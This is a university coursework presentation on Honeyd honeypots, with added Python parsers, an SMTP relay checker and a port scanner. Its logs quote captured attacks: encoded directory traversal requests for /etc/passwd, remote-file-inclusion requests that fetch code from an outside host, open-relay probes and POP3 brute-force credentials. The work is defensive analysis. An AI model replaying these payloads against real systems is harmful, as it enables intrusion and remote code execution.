Using Honeypots with Honeyd

Pedro Pereira, Ulisses Costa
Cryptography and Information Systems Security (Criptografia e Segurança de Sistemas de Informação)
18 December 2008

Coursework on deploying honeypots with Honeyd.
Contents

1 Introduction
    Honeypots
    Honeyd
2 Logs
    The main Honeyd log
3 SMTP
    Open mail relay
4 HTTP
    webcollage/1.135a
    Directory traversal
    Morfeus Scanner: WebCalendar, Mambo/Joomla, preventing Morfeus Scanner attacks
    Attack on POP3
    SSH
5 The threat
What are honeypots?

- Programs that emulate known vulnerabilities.
- Traps for detecting or stopping attacks.

Types of honeypots

- By personality: high-interaction or low-interaction.
- By modus operandi: server or client.
Honeyd

- Creates virtual hosts.
- Each virtual host is configured individually.
- Supports more than 1000 personalities (OS fingerprints).
- Ships many dozens of scripts for emulating services.

Honeyd configuration

First make the machine answer ARP requests for the honeypot's address (farpd), then set the init-script defaults:

    bash> farpd 192.168.1.50 -i eth0

    # File: /etc/defaults/honeyd
    # Defaults for honeyd initscript
    # Run as a daemon
    RUN="yes"
    # Network interface on which honeyd listens for requests
    INTERFACE="eth0"
    # Network that honeyd simulates
    NETWORK=192.168.1.50
    # Option set
    # -c hostname:port:username:password
    OPTIONS="-c localhost:12345:username:password"

The -c hostname:port:username:password option

It makes honeyd report to a honeydstats collector, which produces partial statistics (OS, port, spammer and country reports):

    bash> honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country -f /etc/honeypot/honeydstats.conf -l localhost -p 12345

    # File: /etc/honeypot/honeydstats.conf
    # honeydstats configuration file
    username:password

Honeypot configuration (1/2)

A single template, win2k, with a Windows 2000 personality. Every port not listed answers with a reset (TCP) or port-unreachable (UDP), ICMP is dropped silently, and each listed port runs an emulation script that receives the connection's source and destination addresses and ports:

    # File: /etc/honeypot/honeyd.conf
    # Honeypot configuration
    create win2k
    set win2k personality "Microsoft Windows 2000 SP2"
    set win2k default tcp action reset
    set win2k default udp action reset
    set win2k default icmp action block
    set win2k uptime 3567
    add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
    add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
    add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"

Honeypot configuration (2/2)

    add win2k udp port 137 proxy $ipsrc:137
    add win2k udp port 138 proxy $ipsrc:138
    add win2k udp port 445 proxy $ipsrc:445
    add win2k tcp port 137 proxy $ipsrc:137
    add win2k tcp port 138 proxy $ipsrc:138
    add win2k tcp port 139 proxy $ipsrc:139
    add win2k tcp port 445 proxy $ipsrc:445
    bind 192.168.1.50 win2k

- Monitoring the NetBIOS/SMB ports (137, 138, 139, 445) properly was not feasible: the protocols are far too complex to emulate.
- Decision: proxy those connections back to their source.
- Start the honeypot:

    bash> /etc/init.d/honeyd start
Files

    /var/log/honeyd.txt            SMTP, Telnet, IMAP, POP3
    /var/log/honeypot/web.log      HTTP
    /var/log/honeypot/honeyd.log   Main Honeyd log
Format of /var/log/honeypot/honeyd.log

One record per line. Columns: Date, Protocol, T, SrcIP, SrcPort, DstIP, DstPort, Info, Comment. In column T, S marks the start of a connection, E its end and "-" a packet that belongs to no connection. The Comment is the passive OS fingerprint Honeyd attaches to the source when it has one.

    Date  Protocol  T  SrcIP            SrcPort  DstIP  DstPort: Info   Comment
    ...   tcp(6)    S  88.44.123.210    3637     ...    139             [Windows XP SP1]
    ...   tcp(6)    S  82.155.0.49      22617    ...    139
    ...   tcp(6)    E  82.155.1.160     4399     ...    445: 0 0
    ...   tcp(6)    -  82.155.122.18    61582    ...    139: 40 R
    ...   icmp(1)   -  80.236.5.27               ...: 3(13): 56
    ...   tcp(6)    -  82.154.64.174    34507    ...    445: 40 RA
    ...   tcp(6)    -  124.8.74.33      1806     ...    25: 70 FPA      [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA      [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA
    ...   tcp(6)    -  82.155.57.245    58274    ...    445: 52 PA      [Windows XP SP1]
    ...   tcp(6)    -  193.136.19.149   58274    ...    445: 52 PA
    ...   tcp(6)    -  88.175.73.149    4332     ...    139: 40 R       [Windows XP SP1]
    ...   tcp(6)    -  82.155.137.139   1230     ...    445: 40 A       [Windows XP SP1]
    ...   tcp(6)    -  82.155.7.176     2794     ...    445: 40 A
    ...   tcp(6)    -  82.155.116.238   3578     ...    23: 60 S        [Linux 2.6.1-7]
    ...   tcp(6)    -  124.207.41.198   48804    ...    23: 40 S
    ...   udp(17)   -  192.168.1.254    67       ...    68: 298

- Dates have the form 2008-12-15-22:59:03.4039.
- DstIP is always the same here (192.168.1.50), so both it and the date are abbreviated to "..." in the table.

A complete TCP connection in the log:

    2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
    2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008

- For TCP and UDP not every packet is recorded; that would be far too verbose.
- Only the amount of data transferred is kept: the two counters on the E record (150 and 1008 bytes, received and sent).
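A parser for this record format, written for this page as an added example (it is not code from the slides or from Honeyd). The sample lines are those shown above; the per-packet records had their dates elided on the slides, so plausible dates are filled in and the sample is labelled as constructed. The summary keeps exactly what the log keeps: connection starts, byte counts per completed session, and the fingerprint per source.

```python
"""Parser for the Honeyd main log (/var/log/honeypot/honeyd.log).
Added example; not code from the slides or from Honeyd itself."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed from the lines on the slides. The per-packet ("-") records
# had their dates elided there, so plausible dates are filled in.
SAMPLE_LOG = """\
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
2008-12-15-22:59:03.4039 tcp(6) - 82.155.122.18 61582 192.168.1.50 139: 40 R
2008-12-15-22:59:04.1000 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
2008-12-15-22:59:05.2000 tcp(6) - 82.155.116.238 3578 192.168.1.50 23: 60 S [Linux 2.6.1-7]
2008-12-15-22:59:06.3000 udp(17) - 192.168.1.254 67 192.168.1.50 68: 298
"""

# date proto(num) T src [sport] dst [dport][: info] [os fingerprint]
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.\d+) "
    r"(?P<proto>tcp|udp|icmp)\(\d+\) "
    r"(?P<kind>[SE-]) "
    r"(?P<src>\d+(?:\.\d+){3})(?: (?P<sport>\d+))? "
    r"(?P<dst>\d+(?:\.\d+){3})(?: (?P<dport>\d+))?"
    r"(?::\s*(?P<info>[^\[]*?))?"
    r"\s*(?:\[(?P<os>[^\]]+)\])?\s*$"
)


@dataclass
class Record:
    ts: str
    proto: str
    kind: str                 # S = connection start, E = end, - = lone packet
    src: str
    sport: Optional[int]      # absent on ICMP records
    dst: str
    dport: Optional[int]
    info: str                 # after the colon: "recv sent" on E records,
                              # "len flags" on TCP packets, "type(code): len" on ICMP
    os: Optional[str]         # passive fingerprint Honeyd attaches in brackets

    def bytes_transferred(self):
        """(received, sent) for an E record, else None."""
        if self.kind != "E":
            return None
        recv, sent = self.info.split()
        return int(recv), int(sent)


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    g = m.groupdict()
    return Record(ts=g["ts"], proto=g["proto"], kind=g["kind"], src=g["src"],
                  sport=int(g["sport"]) if g["sport"] else None,
                  dst=g["dst"], dport=int(g["dport"]) if g["dport"] else None,
                  info=(g["info"] or "").strip(), os=g["os"])


def parse_log(text):
    return [r for r in map(parse_line, text.splitlines()) if r]


def summarize(records):
    """Connection starts per (proto, port), completed sessions with their
    byte counts, and the fingerprint last seen for each source."""
    starts, sessions, fingerprints = Counter(), [], {}
    for r in records:
        if r.kind == "S":
            starts[(r.proto, r.dport)] += 1
        elif r.kind == "E":
            recv, sent = r.bytes_transferred()
            sessions.append((r.src, r.dport, recv, sent))
        if r.os:
            fingerprints[r.src] = r.os
    return {"starts": starts, "sessions": sessions, "fingerprints": fingerprints}


if __name__ == "__main__":
    for key, value in summarize(parse_log(SAMPLE_LOG)).items():
        print(key, value)
```

Feeding the real file is `summarize(parse_log(open("/var/log/honeypot/honeyd.log").read()))`; lines the regex does not recognise are skipped rather than raising, which is what you want on a log that an attacker partly controls.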
SMTP

- Used on the server side to send messages.
- To receive messages, POP3 or IMAP is used.

SMTP honeypot

(chart)

The EHLO command in SMTP

The command with which a client identifies itself. Transcript of the emulated Exchange banner and EHLO reply:

    S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
    C: EHLO windows
    S: 250-bps-pc9.local.mynet Hello [12]
    S: 250-TURN
    S: 250-ATRN
    S: 250-SIZE
    S: 250-ETRN
    S: 250-PIPELINING
    S: 250-DSN
    S: 250-ENHANCEDSTATUSCODES
    S: 250-8bitmime
    S: 250-BINARYMIME
    S: 250-CHUNKING
    S: 250-VRFY
    S: 250-X-EXPS GSSAPI NTLM LOGIN
    S: 250-X-EXPS=LOGIN
    S: 250-AUTH GSSAPI NTLM LOGIN
    S: 250-AUTH=LOGIN
    S: 250-X-LINK2STATE
    S: 250-XEXCH50
    S: 250 OK

The emulated server identifies itself with domain names that are not real (bps-pc9.local.mynet).

Spam on SMTP servers

(chart)

Solutions

- Require a proper EHLO [host] argument (a fully qualified name or an address literal).
- Check whether the names given actually resolve.
Attacks

Open-relay probes recorded on port 25. The client greets with the honeypot's own public address, and both sender and recipient are external; the Subject embeds that address so that, if the message ever reaches the recipient mailbox, the prober learns which host relayed it:

    HELO 82.155.248.223
    MAIL FROM: <jk9l3g4jle@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

    2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
    2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920

A second probe of the same kind, this time with several connections in a row:

    HELO 82.155.251.32
    MAIL FROM: <gt48m7g3k6f@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname = 82.155.251.32

    2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
    2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
    2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
    2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
    2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418

A third probe that submits a full message, with a forged Received header naming the honeypot as the relaying host:

    HELO 82.155.103.147
    MAIL FROM: <ttc585ttc585@yahoo.com.tw>
    RCPT TO: <vjd39hww@yahoo.com.tw>
    DATA
    Received: from ([145.200.201.114]) by 82.155.103.147 id <9624303-98482>; Tue, 06 Jan 2009 21:16:04 -0100
    Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
    From: "" <ttc585ttc585@yahoo.com.tw>
    To: <vjd39hww@yahoo.com.tw>
    Subject: BC_82.155.103.147
    Date: Tue, 06 Jan 09 21:16:04 GMT
    MIME-Version: 1.0
    Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
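The relay policy a real mail server would apply to the sessions above, replayed offline, as an added example (written for this page, not code from the slides). It assumes the honeypot accepts mail for the domain local.mynet and relays outbound only for 192.168.1.0/24; both values are assumptions, as is the optional resolver hook that implements the "check whether the EHLO name resolves" suggestion without touching DNS.

```python
"""Relay policy for an SMTP listener, replayed over captured command
sequences. Added example; not code from the slides."""
import ipaddress
import re
from dataclasses import dataclass, field

LOCAL_DOMAINS = {"local.mynet"}                            # assumed: domains we accept mail for
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]   # assumed: clients allowed to relay out
# Addresses the honeypot was reached on: its LAN address plus the public
# addresses the relay probes on the slides echoed back in HELO.
OUR_ADDRESSES = {"192.168.1.50", "82.155.248.223", "82.155.251.32", "82.155.103.147"}

FQDN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)
LITERAL_RE = re.compile(r"^\[([0-9.]+)\]$")
ADDR_RE = re.compile(r"<([^>]*)>")


def valid_helo(arg, resolver=None):
    """RFC 5321: the EHLO/HELO argument is an FQDN or an address literal
    like [1.2.3.4]; a bare IP or a single word such as 'windows' fails.
    With a resolver callable (name -> address or None), FQDNs that do not
    resolve fail too, which is the check suggested on the slide."""
    if FQDN_RE.match(arg):
        return resolver is None or resolver(arg) is not None
    m = LITERAL_RE.match(arg)
    if not m:
        return False
    try:
        ipaddress.ip_address(m.group(1))
        return True
    except ValueError:
        return False


def is_trusted(client_ip):
    return any(ipaddress.ip_address(client_ip) in net for net in TRUSTED_NETS)


@dataclass
class Verdict:
    responses: list = field(default_factory=list)
    flags: set = field(default_factory=set)


def evaluate(client_ip, commands, resolver=None):
    """The reply each command would get, plus flags for the analyst."""
    v, accepted_rcpts = Verdict(), 0
    for line in commands:
        verb, _, arg = line.partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb in ("HELO", "EHLO"):
            if arg in OUR_ADDRESSES:
                v.flags.add("helo_with_our_ip")      # open-relay scanner signature
            if valid_helo(arg, resolver):
                v.responses.append("250 OK")
            else:
                v.flags.add("bad_helo")
                v.responses.append("501 Syntax: HELO hostname")
        elif verb == "MAIL":
            v.responses.append("250 OK")
        elif verb == "RCPT":
            rcpt = ADDR_RE.search(arg).group(1)
            domain = rcpt.rpartition("@")[2].lower()
            if domain in LOCAL_DOMAINS or is_trusted(client_ip):
                accepted_rcpts += 1
                v.responses.append("250 OK")
            else:
                v.flags.add("relay_attempt")          # external sender to external recipient
                v.responses.append("554 5.7.1 Relay access denied")
        elif verb == "DATA":
            v.responses.append("354 End data with <CR><LF>.<CR><LF>"
                               if accepted_rcpts else "554 5.5.1 No valid recipients")
        else:
            v.responses.append("500 Command not recognised")
    return v


# The first open-relay probe captured on the slides.
RELAY_PROBE = ["HELO 82.155.248.223",
               "MAIL FROM: <jk9l3g4jle@yahoo.com>",
               "RCPT TO: <sseenndd1201@yahoo.com.hk>",
               "DATA"]

if __name__ == "__main__":
    print(evaluate("124.11.193.219", RELAY_PROBE))
```

The probe collects three flags at once: it greets with the server's own address, its HELO argument is a bare IP, and it asks for an external recipient from an untrusted network. A legitimate inbound delivery to a local mailbox collects none, even from an unknown network, which is the distinction an open-relay check exists to test.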
HTTP hits

(chart)
User agent: webcollage/1.135a

    --MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
    User-Agent: webcollage/1.135a
    Referer: http://random.yahoo.com/fast/ryl
    Host: www.morgangirl.com
    ",--ENDMARK--

- An attempt to fetch an image through the honeypot: the request line carries an absolute URL, so the client is treating the honeypot as an open HTTP proxy.
- The honeypot was probably "seen" by a proxy scanner and listed as an open proxy.
Directory traversal

- Also known as the dot-dot-slash attack (../).
- Exploits insufficient validation of the requested path.
- Target: system files, here /etc/passwd.

The five requests below came from the same source within seven seconds, each trying a different encoding of the same path (decoded request line first, then the record as logged).

Plain ../ sequences:

    GET ../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

A leading .../ segment:

    GET .../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Backslash-slash pairs (..\/):

    GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Windows-style backslashes only:

    GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

A doubled leading slash:

    GET //etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--

Conclusion

- The attempts did not succeed against the honeypot: it is a low-interaction system, and the emulated IIS answered every one of them with "302 Object moved".
- The User-Agent shows the Nmap scripting engine (NSE) being used for the probes.
Morfeus Scanner

- Scans for PHP vulnerabilities.
- Targets known vulnerabilities, as the two requests below show.

Morfeus Scanner: WebCalendar

- WebCalendar creates online calendars.
- The vulnerability is in the file send_reminders.php: the scanner sets its includedir parameter to a URL on a remote host, so that a vulnerable installation fetches and executes remote PHP code (remote file inclusion).

    --MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--

Morfeus Scanner: Mambo/Joomla

- Very widely used CMSs.
- The attacker tries to set the variable mosConfig_absolute_path used by index.php, again pointing it at a URL on the same remote host.

    --MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--

Preventing Morfeus Scanner attacks

One way to block this kind of request from Morfeus is to add the following lines to the ".htaccess" file in the website's directory; they refuse (403 Forbidden) any request whose User-Agent starts with "Morfeus":

    # Start of .htaccess change.
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^Morfeus
    RewriteRule ^.*$ - [F]
    # End of .htaccess change.

The User-Agent is chosen by the client, so this only stops scanners that announce themselves; the real fix is not to let request parameters reach include().
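A parser for the --MARK-- records shown in the traversal, Morfeus and POP3 sections, with a classifier that normalises the request target before looking at it, so that all five traversal encodings, the proxy request and the two remote-file-inclusion probes are recognised by the same rules. This is an added example written for this page, not code from the slides or from Honeyd; the sample is constructed from the records above, with the traversal payloads shortened to three segments and some headers dropped. The label set (proxy_request, traversal, sensitive_file, rfi:<parameter>) is this example's own naming.

```python
"""Parse Honeyd service-script records (--MARK-- ... --ENDMARK--) and
classify the requests they carry. Added example; not code from the slides."""
import re
from urllib.parse import parse_qsl, unquote

# Constructed from the records on the slides; traversal payloads shortened
# to three segments and some headers dropped for brevity.
SAMPLE = '''\
--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Host: www.morgangirl.com
",--ENDMARK--
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
",--ENDMARK--
--MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,"GET %2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
User-Agent: Nmap NSE
",--ENDMARK--
--MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
",--ENDMARK--
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
",--ENDMARK--
--MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
",--ENDMARK--
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root
PASS root
",--ENDMARK--
'''

MARK_RE = re.compile(
    r'--MARK--,"(?P<when>[^"]*)","(?P<service>[^"]*)","(?P<src>[^"]*)",'
    r'"(?P<dst>[^"]*)",(?P<sport>\d+),(?P<dport>\d+),"(?P<payload>.*?)",--ENDMARK--',
    re.DOTALL)

SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/boot.ini", "/win.ini")


def parse_records(text):
    return [m.groupdict() for m in MARK_RE.finditer(text)]


def normalize_target(target):
    """Decode percent-encoding until it stops changing (catches double
    encoding), map backslashes to slashes, split off an absolute-URL prefix
    (a proxy request) and the query, and collapse repeated slashes in the
    path so that every variant of ../ compares equal."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    target = target.replace("\\", "/")
    m = re.match(r"^https?://[^/?]*", target, re.I)
    prefix = m.group(0) if m else ""
    path, _, query = target[len(prefix):].partition("?")
    return prefix, re.sub(r"/{2,}", "/", path), query


def classify_http(payload):
    request_line, _, headers = payload.partition("\n")
    parts = request_line.split()
    if len(parts) < 2:
        return {"tags": {"malformed"}, "path": None, "ua": None}
    prefix, path, query = normalize_target(parts[1])
    tags = set()
    if prefix:
        tags.add("proxy_request")        # honeypot used as an open proxy
    if any(re.fullmatch(r"\.{2,}", seg) for seg in path.split("/")):
        tags.add("traversal")            # "..", "..." and longer runs of dots
    if path.endswith(SENSITIVE_FILES):
        tags.add("sensitive_file")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            tags.add("rfi:" + key)       # remote file inclusion via a URL parameter
    ua = re.search(r"^User-Agent:\s*(.+?)\s*$", headers, re.M | re.I)
    return {"tags": tags, "path": path, "ua": ua.group(1) if ua else None}


def extract_credentials(payload):
    """USER/PASS pairs from POP3-style transcripts (the brute-force records)."""
    return re.findall(r"^USER (\S+)\s+PASS (\S+)", payload, re.M)


def analyze(text):
    out = []
    for rec in parse_records(text):
        entry = {"src": rec["src"], "service": rec["service"]}
        if rec["service"].endswith("/HTTP"):
            entry.update(classify_http(rec["payload"]))
        else:
            entry["credentials"] = extract_credentials(rec["payload"])
        out.append(entry)
    return out


if __name__ == "__main__":
    for entry in analyze(SAMPLE):
        print(entry)
```

Decoding in a loop matters: a scanner that sends %252E%252E%252F gets through a single unquote untouched, and the backslash form only matches the slash form after the mapping, which is also why a server must canonicalise before it checks the path rather than after.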
Brute-force attempt on the POP3 server

(chart)

Dictionary attempts against the emulated Exchange POP3 service, one connection per USER/PASS pair, about one per second:

    ...
    --MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root
    PASS root
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,"USER root
    PASS root1
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,"USER staff
    PASS staff
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER root
    PASS 12345
    ",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER www
    PASS www
    ",--ENDMARK--
    ...
SSH

Here is a chart of the usernames tried:

(chart)

And the following chart shows the passwords tried:

(chart)
The threat

(figure)

Port scanning

- Discover machines and their open ports.
- Built on custom-crafted packets.
- Hard to master.
- Tool: NMap (insecure.org).

Port states

- Open or Accepted: the machine answered indicating that a service is listening on that port.
- Closed, Denied or Not Listening: the machine answered indicating that any connection to the port will be refused.
- Filtered, Dropped or Blocked: no answer from the machine.

Scan techniques

- TCP SYN
- TCP Connect
- UDP

TCP Connect

(figure)

Optimisation

Skipping host discovery (-P0, called -Pn in current Nmap) found three more hosts that do not answer pings, for almost the same total scan time:

    golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
    golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds
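The TCP Connect technique and the three port states above, in an added example written for this page (not code from the slides or from Nmap). A SYN scan needs raw sockets and root; a connect scan only needs connect(), so it is the one that can be shown here in a few lines. The demo assumes loopback sockets are available: it listens on one free port, frees another, and scans both.

```python
"""TCP connect scan (what nmap -sT does) with the three port states from
the slides. Added example; not code from the slides or from nmap."""
import socket
from contextlib import closing


def tcp_connect_state(host, port, timeout=1.0):
    """Full three-way handshake against one port.
    open     - connect() succeeded: a service accepted the SYN
    closed   - the host answered with RST (ECONNREFUSED)
    filtered - nothing came back before the timeout (dropped by a firewall)"""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"
        except OSError as exc:            # e.g. EHOSTUNREACH: no route at all
            return f"error:{exc.errno}"


def scan(host, ports, timeout=1.0):
    """Scan ports sequentially; returns {port: state}."""
    return {port: tcp_connect_state(host, port, timeout) for port in ports}


def demo():
    """Offline demonstration: listen on one free loopback port, release a
    second one, then scan both. Returns (state of listening port,
    state of released port)."""
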